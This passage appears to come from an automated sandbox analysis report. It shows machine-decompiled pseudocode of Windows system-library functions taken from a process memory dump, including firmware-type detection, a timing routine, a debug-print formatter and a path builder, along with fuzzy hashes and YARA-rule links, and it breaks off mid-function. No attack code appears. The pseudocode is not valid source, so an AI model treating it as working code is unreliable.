					_t113 = L04614620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0463AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0467500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04639860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x046751be
0x046751c3
0x046751c8
0x046751cd
0x046751d0
0x046751d3
0x046751d8
0x046751db
0x046751de
0x046751e0
0x046751e3
0x046751e6
0x046751e8
0x04675342
0x04675351
0x04675356
0x0467535a
0x04675360
0x04675363
0x04675366
0x04675369
0x04675369
0x0467536b
0x0467536b
0x04675370
0x046753a3
0x046753a4
0x046753a6
0x046753ab
0x046753ab
0x046753ae
0x046753ae
0x046753b5
0x046753bf
0x046753bf
0x04675375
0x04675396
0x046753a0
0x046753a0
0x00000000
0x04675396
0x04675377
0x04675379
0x0467537f
0x0467538c
0x04675390
0x00000000
0x04675390
0x046751ee
0x046751f1
0x04675301
0x04675310
0x04675315
0x04675318
0x0467531b
0x04675320
0x0467532e
0x04675331
0x00000000
0x04675331
0x04675328
0x04675329
0x00000000
0x04675329
0x046751fa
0x04675235
0x04675236
0x04675239
0x0467523f
0x04675240
0x04675241
0x04675242
0x04675246
0x04675247
0x0467524e
0x04675251
0x04675267
0x04675269
0x0467526e
0x0467527d
0x0467527e
0x04675281
0x04675282
0x04675287
0x04675288
0x0467528a
0x0467528f
0x04675294
0x00000000
0x00000000
0x0467529a
0x0467529c
0x0467529e
0x0467529e
0x046752a4
0x046752b0
0x00000000
0x00000000
0x046752ba
0x046752bc
0x046752bc
0x046752d4
0x046752d9
0x046752dc
0x046752e1
0x00000000
0x00000000
0x046752e7
0x046752f4
0x00000000
0x046752f4
0x04675270
0x00000000
0x04675270
0x046751fc
0x046751fd
0x04675202
0x04675203
0x04675205
0x0467520a
0x0467520f
0x00000000
0x00000000
0x0467521b
0x04675226
0x0467522b
0x0467521d
0x0467521d
0x04675222
0x04675222
0x0467522d
0x00000000

Strings

UEFI, xrefs: 0467521D
Legacy, xrefs: 04675226

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 1cfd177ac362f09e6180d0ffeb47eb8cbb04b4b3d5c186ad40396f277faafedf
Instruction ID: f7b6b60260fd98a0380554292c39eaa7de4fba1f449a2b4e7b72ac07754061b1
Opcode Fuzzy Hash: 1cfd177ac362f09e6180d0ffeb47eb8cbb04b4b3d5c186ad40396f277faafedf
Instruction Fuzzy Hash: 95518F71E00608AFEB24DFA8C840AADB7F8FF44704F54446DE65AEB651FB71A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0461B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0461B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x46ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04617D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E046C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04639E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0463B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0463CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04617D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E046C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0463AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x46e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x46e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x46e8628; // 0x0
							_t116 =  *0x46e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0461b94c
0x0461b956
0x0461b95c
0x0461b95e
0x0461b964
0x0461b969
0x0461b96d
0x0461b96d
0x0461b970
0x0461b974
0x0461b97a
0x0461badf
0x0461badf
0x0461bae2
0x0461bae4
0x0461bae6
0x0461baf0
0x04662cb8
0x0461baf6
0x0461baf6
0x0461baf6
0x0461bafd
0x0461bb1f
0x0461bb1f
0x0461baff
0x0461bb00
0x0461bb00
0x0461bb03
0x0461bb03
0x0461bacb
0x0461bacf
0x0461bad0
0x0461bad1
0x0461badc
0x0461badc
0x0461b980
0x0461b980
0x0461b988
0x0461b98b
0x0461b98d
0x0461b990
0x0461b993
0x0461b999
0x0461b99b
0x0461b9a1
0x0461b9a5
0x0461b9aa
0x0461b9b0
0x0461b9bb
0x0461b9c0
0x0461b9c3
0x0461b9ca
0x0461b9cc
0x0461b9cf
0x0461b9d3
0x0461b9d7
0x0461ba94
0x0461ba94
0x0461ba98
0x0461baa3
0x04662ccb
0x0461baa9
0x0461baa9
0x0461baa9
0x0461bab1
0x04662cd5
0x04662cdd
0x04662cdd
0x0461babb
0x0461babc
0x0461bac2
0x0461bac3
0x0461bac3
0x0461bac6
0x00000000
0x0461b9dd
0x0461b9dd
0x0461b9e7
0x0461b9e7
0x0461b9ec
0x0461b9ec
0x0461b9f1
0x0461b9f5
0x0461b9fa
0x0461ba00
0x0461ba0c
0x0461ba10
0x0461ba10
0x0461ba12
0x0461ba18
0x00000000
0x00000000
0x0461bb26
0x0461bb26
0x0461ba1e
0x0461ba1e
0x0461ba23
0x0461ba25
0x0461ba2c
0x0461ba30
0x0461ba35
0x0461ba35
0x0461ba41
0x0461ba46
0x0461ba4c
0x0461ba50
0x0461ba54
0x0461ba6a
0x0461ba6e
0x0461ba70
0x0461ba74
0x0461ba78
0x0461ba7a
0x0461ba7c
0x0461ba8e
0x0461ba90
0x0461ba92
0x0461bb14
0x0461bb14
0x0461bb16
0x0461bb16
0x00000000
0x0461ba7c
0x0461bb0a
0x0461bb0d
0x00000000
0x00000000
0x00000000
0x0461bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0461B9A5

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 088cc471f2c6e89936f5ff9aaef217498f8a052bd84fbd0c11d64ee9567607f3
Instruction ID: e8d02615f7cba66f29acc2eaf738d73496e680d866ffe7112f7f1158d5397c57
Opcode Fuzzy Hash: 088cc471f2c6e89936f5ff9aaef217498f8a052bd84fbd0c11d64ee9567607f3
Instruction Fuzzy Hash: 74513871A08341CFC720DF29C48092ABBE5FB88B14F18896EE59597365E771F845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 045FB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E045FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x46cf7a8);
				E0464D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0464D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0463D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0463F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0464DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0463B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0463B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0463E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0463A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x045fb171
0x045fb171
0x045fb171
0x045fb171
0x045fb171
0x045fb176
0x045fb17b
0x045fb180
0x045fb186
0x045fb18f
0x045fb198
0x045fb1a4
0x045fb1aa
0x04654802
0x04654802
0x04654805
0x0465480c
0x0465480e
0x045fb1d1
0x045fb1d3
0x045fb1de
0x045fb1de
0x04654817
0x0465481e
0x04654820
0x04654822
0x04654822
0x04654824
0x04654824
0x0465482a
0x00000000
0x00000000
0x04654835
0x0465483a
0x0465483d
0x0465483f
0x04654842
0x04654842
0x04654842
0x04654846
0x0465484c
0x0465484e
0x04654851
0x04654851
0x04654853
0x04654854
0x04654854
0x04654858
0x0465485a
0x0465485a
0x0465485d
0x0465485f
0x04654861
0x04654861
0x04654866
0x0465486b
0x0465486e
0x04654871
0x04654876
0x04654876
0x04654878
0x0465487b
0x04654884
0x04654884
0x00000000
0x0465487d
0x0465487d
0x04654882
0x04654889
0x04654889
0x0465488f
0x04654891
0x046548e0
0x046548e2
0x046548e4
0x046548e4
0x046548e7
0x046548e7
0x046548ed
0x046548f4
0x046548f6
0x04654951
0x04654951
0x04654953
0x04654953
0x04654956
0x04654956
0x04654958
0x04654959
0x04654959
0x0465495d
0x0465495d
0x0465495f
0x0465495f
0x04654965
0x04654969
0x046549ba
0x046549ba
0x046549c1
0x046549c5
0x046549cc
0x046549d4
0x046549d7
0x046549da
0x046549e4
0x046549e5
0x046549f3
0x04654a02
0x00000000
0x04654a02
0x04654972
0x04654974
0x00000000
0x00000000
0x04654976
0x04654979
0x04654982
0x04654983
0x04654984
0x0465498b
0x0465498d
0x04654991
0x04654993
0x04654999
0x0465499d
0x046549a2
0x046549a2
0x046549a2
0x04654999
0x046549ac
0x00000000
0x046549b3
0x046548f8
0x046548fe
0x00000000
0x00000000
0x00000000
0x046548fe
0x04654895
0x0465489c
0x046548ad
0x046548b2
0x046548b5
0x046548b7
0x046548ba
0x046548bc
0x046548c6
0x046548c6
0x046548cb
0x046548d1
0x046548d4
0x046548d8
0x046548d8
0x00000000
0x046548d8
0x046548be
0x046548c0
0x00000000
0x00000000
0x046548c2
0x00000000
0x00000000
0x00000000
0x046548c4
0x00000000
0x04654882
0x0465487b
0x04654904
0x04654906
0x00000000
0x00000000
0x04654908
0x0465490e
0x00000000
0x00000000
0x04654910
0x04654917
0x04654917
0x00000000
0x04654917
0x045fb1ba
0x046547f9
0x046547fc
0x00000000
0x00000000
0x00000000
0x046547fc
0x045fb1c0
0x045fb1c0
0x045fb1c3
0x045fb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 046548AD

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 9221f4b2e46e4bd393efd1a62536d84e4ab78b4e9cd73c7be7542c39f7631d44
Instruction ID: be19127d6ec37b59fa731312e18ca9fa586c667b6a13339cf04984c320156b1b
Opcode Fuzzy Hash: 9221f4b2e46e4bd393efd1a62536d84e4ab78b4e9cd73c7be7542c39f7631d44
Instruction Fuzzy Hash: 4551CF71E002598EEB35CF64C845BAEBBB1BF04714F1041ADDC59AB3A1EB70A981DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04622581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E04622581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				void* _t246;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				signed int _t257;
				signed int _t264;
				signed int _t267;
				signed int _t275;
				intOrPtr _t281;
				signed int _t283;
				signed int _t285;
				void* _t287;
				signed int _t288;
				unsigned int _t291;
				signed int _t295;
				signed int _t297;
				signed int _t301;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				void* _t332;
				signed int _t333;
				signed int _t335;
				signed int _t338;
				void* _t339;

				_t335 = _t338;
				_t339 = _t338 - 0x4c;
				_v8 =  *0x46ed360 ^ _t335;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t329 = 0x46eb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t281 = 0x48;
				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t322 = 0;
				_v37 = _t311;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
						_t329 = L04614620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t329 + 0x3c)) = _t281;
							_t283 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t329 + 0x18) = _t324;
								__eflags = _t311 - 0x46e8478;
								 *_t329 = ((0 | _t311 == 0x046e8478) - 0x00000001 & 0xfffffffb) + 7;
								E0463F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t339 = _t339 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E046839F2(_t324);
									_t311 = _v32;
									_t324 = _t275;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t285 = _t329 + _t283 * 4;
								_v56 = _t285;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t239 =  *(_v60 + _t295 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t285 =  *(_v60 + _t295 * 4);
										 *(_t285 + 0x18) = _t324;
										_t243 =  *(_v60 + _t295 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M04622959))) {
												case 0:
													__ax =  *0x46e8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0463F3E0(__edi,  *0x46e848c, __ax & 0x0000ffff);
														__eax =  *0x46e8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0463F3E0(_t324, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x46e8480 & 0x0000ffff = E0463F3E0(__edi,  *0x46e8484,  *0x46e8480 & 0x0000ffff);
													__eax =  *0x46e8480 & 0x0000ffff;
													__eax = ( *0x46e8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0463F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0463F3E0(_t324, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t339 = _t339 + 0xc;
													_t324 = _t324 + (_t270 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t324 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0463F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x46e8478 & 0x0000ffff = E0463F3E0(__edi,  *0x46e847c,  *0x46e8478 & 0x0000ffff);
													__eax =  *0x46e8478 & 0x0000ffff;
													__eax = ( *0x46e8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E046839F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x46e6e58 & 0x0000ffff = E0463F3E0(__edi,  *0x46e6e5c,  *0x46e6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x46e6e58 & 0x0000ffff;
													__eax = ( *0x46e6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t285 = _t285 + 4;
													__eflags = _t285;
													_v56 = _t285;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
